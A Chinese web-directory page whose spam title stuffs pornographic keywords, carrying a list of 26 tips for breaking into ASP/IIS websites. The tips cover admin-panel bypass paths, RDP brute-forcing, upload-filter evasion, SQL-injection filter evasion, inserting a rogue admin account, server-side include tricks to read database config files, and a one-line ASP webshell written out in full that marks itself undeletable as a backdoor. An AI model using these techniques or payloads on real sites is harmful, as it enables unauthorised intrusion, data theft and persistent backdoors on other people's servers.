日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網(wǎng)為廣大站長提供免費(fèi)收錄網(wǎng)站服務(wù),提交前請做好本站友鏈:【 網(wǎng)站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(wù)(50元/站),

點(diǎn)擊這里在線咨詢客服
新站提交
  • 網(wǎng)站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會(huì)員:747

1.利用網(wǎng)站過濾不嚴(yán)直接繞過后臺(tái)驗(yàn)證,在網(wǎng)站后面加上 admin/session.asp 或 admin/left.asp

2.有的網(wǎng)站進(jìn)后臺(tái)會(huì)出現(xiàn)一個(gè)腳本提示框,輸入:administrator 即可突破!因?yàn)閍dmin代表以管理員身份進(jìn)入的意思。

3.有的網(wǎng)站開了3389,入侵之前先去連接3389,嘗試弱口令或是爆破,再者就是按5次shift鍵,看看有沒前人裝過后門,然后再社工密碼。

4.有時(shí)候進(jìn)后臺(tái)會(huì)彈出提示框“請登陸”,把地址抄寫出來(復(fù)制不了),然后放在網(wǎng)頁源代碼分析器里,選擇瀏覽器-攔截跳轉(zhuǎn)勾選–查看即可進(jìn)入后臺(tái)!

5.突破防盜鏈訪問webshell,代碼:JAVAscript:document.write(“<a href=’http://www.xxx.com/uploadfile/1.asp’>fuck</a>”) 回車后點(diǎn)擊GO即可進(jìn)入webshell

6.突破一流信息監(jiān)控?cái)r截系統(tǒng)訪問,當(dāng)小馬可以訪問,上傳大馬卻不行的時(shí)候,可以先用大馬跟一張圖片合并,在上傳合并后的圖片,接著數(shù)據(jù)庫備份后訪問即可!

7.在拿編輯器的shell時(shí),有時(shí)增加了asp|asa|cer|php|aspx等擴(kuò)展名上傳時(shí)都被過濾了,其實(shí)只要增加aaspsp 上傳asp就會(huì)突破了。

8.有時(shí)啊D猜出表段了,但是猜不到字段的時(shí)候,可以到后臺(tái)查看源文件,搜索ID或type,一般都能找到,再到啊D里添加字段進(jìn)行猜解內(nèi)容即可突破。

9.社工后臺(tái)密碼可以用這個(gè)技巧,假如網(wǎng)站域名是:www.baidu.com 管理員名稱為admin,可以試試密碼“baidu”和“baidu.com”來登陸。

10.手工注入時(shí)如果網(wǎng)站過濾了 and 1=1 and 1=2 ,可以用xor 1=1 xor 1=2 進(jìn)行判斷。

11.本地構(gòu)造上傳一句話木馬,如果提示“請先選擇你要上傳的文件![ 重新上傳 ]” ,說明文件太小了,用記事本打開再復(fù)制多幾句話從而擴(kuò)大文件大小,再上傳即可。

12.用啊d跑表,跑字段名name和pass出不來,顯示長度超過50什么的,猜解不出的情況下,這時(shí)放在穿山甲去跑一般都能跑出來!

13.猜管理員后臺(tái)小技巧,admin/left.asp、admin/main.asp、admin/top.asp、admin/admin.asp 會(huì)現(xiàn)出菜單導(dǎo)航,然后迅雷下載全部鏈接。

14.知道表名,字段,使用SQL語句在ACCESS數(shù)據(jù)庫中加個(gè)用戶名及密碼語句:Insert into admin(user,pwd) values(‘test’,’test’)

15.當(dāng)獲得管理員密碼,卻拿不到管理員的帳號(hào)時(shí),到前臺(tái)隨便打開一個(gè)新聞,找找諸如“提交者”“發(fā)布者”之類的字眼,一般“提交者”就是管理員的帳號(hào)了。

16.爆破ASP+IIS架設(shè)的網(wǎng)站web絕對路徑,假設(shè)網(wǎng)站主頁為:http://www.xxxxx/index.asp/ 提交http://www.xxxxx.cn/fkbhvv.aspx/,fkbhvv.aspx是不存在的。

17.源碼的利用,很多網(wǎng)站用的都是網(wǎng)上下載的源碼,有的站長很懶,什么也不改,然后就上傳開通網(wǎng)站了,我們可以去下載一套,里面有很多默認(rèn)的信息值得利用。

18.把以下代碼上傳到webshell里,后綴是asp,就算別人發(fā)現(xiàn)了也刪除不了,算是超級(jí)防刪的一句話木馬了,可以很安全的留個(gè)后門,菜刀連接密碼:x

<%Eval(Request(chr(120))):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if f.attributes <> 39 then:f.attributes = 39:end if%>

19.當(dāng)破解出帳號(hào)密碼卻找不到后臺(tái)的時(shí)候,可以嘗試鏈接ftp,假如域名是:www.baidu.com “ 得到的密碼為“bishi”,我們就可以試下用“xxxx”“xxxx.cn”www.xxxx.cn作為FTP 用戶名,用“bishi”:作為FTP密碼來進(jìn)行登陸,成功的幾率可以很大的哦!ftp的默認(rèn)端口:21 默認(rèn)帳號(hào)密碼:test

20.有的后臺(tái)不顯示驗(yàn)證碼,難道就沒法登錄了么? 其實(shí)把一段代碼導(dǎo)入注冊表里就可以突破這個(gè)困境了,把下面的代碼保存為Code.reg,雙擊導(dǎo)入就可以了!

REGEDIT4

[HKEY_LOCAL_macHINESOFTWAREMicrosoftInternet ExplorerSecurity]

"BlockXBM"=dword:00000000

21.當(dāng)網(wǎng)站不允許上傳 asp、asa、php等文件時(shí),我們可以上傳一個(gè)stm文件,代碼為“<!–#include file=”conn.asp”–>”

(想查看什么文件就寫什么文件名,這里我假設(shè)想查看“conn.asp”),然后直接打開這個(gè)stm文件的地址,再查看源代碼,“conn.asp”這個(gè)文件的代碼就一覽無遺了!

22.當(dāng)網(wǎng)站不允許上傳ASP,CGI,CER,CDX,HTR等類型的文件時(shí),嘗試上傳一個(gè)shtm文件,內(nèi)容為:<!–#includ file=”conn.asp”–>

如果上傳成功,那太好了,訪問地址就可以瀏覽conn.asp里的內(nèi)容了,這樣一來,數(shù)據(jù)庫路徑也就到手啦!

23.手工檢測注入點(diǎn)彈出“你的操作已被記錄!”之類的信息,訪問這個(gè)文件:sqlin.asp,如果存在,在注入點(diǎn)后面植入一句話木馬:‘excute(request(“TNT”))

接著用一句話木馬客戶端連接:http://www.xxx.com/sqlin.asp,上傳木馬即可拿下shell,因?yàn)楹芏喾雷⑷氤绦蚨际怯?rdquo;sqlin.asp“這個(gè)文件名來做非法記錄的數(shù)據(jù)庫。

24.旁注的話,肯定是挑支持aspx的站點(diǎn)來日了,問題是怎樣判斷呢?方法很簡單,在在網(wǎng)站后面加上xxx.aspx,如果返回“/”應(yīng)用程序中的服務(wù)器錯(cuò)誤,無法找到該資源,404畫面就說明支持aspx木馬。

25.網(wǎng)站后面加test.php 可以查看版本

26.禁忌這兩個(gè)網(wǎng)站后臺(tái)文件 admin_index.asp manage_login.asp

分享到:
標(biāo)簽:滲透 網(wǎng)站
用戶無頭像

網(wǎng)友整理

注冊時(shí)間:

網(wǎng)站:5 個(gè)   小程序:0 個(gè)  文章:12 篇

  • 51998

    網(wǎng)站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會(huì)員

趕快注冊賬號(hào),推廣您的網(wǎng)站吧!
最新入駐小程序

數(shù)獨(dú)大挑戰(zhàn)2018-06-03

數(shù)獨(dú)一種數(shù)學(xué)游戲,玩家需要根據(jù)9

答題星2018-06-03

您可以通過答題星輕松地創(chuàng)建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學(xué)四六

運(yùn)動(dòng)步數(shù)有氧達(dá)人2018-06-03

記錄運(yùn)動(dòng)步數(shù),積累氧氣值。還可偷

每日養(yǎng)生app2018-06-03

每日養(yǎng)生,天天健康

體育訓(xùn)練成績評(píng)定2018-06-03

通用課目體育訓(xùn)練成績評(píng)定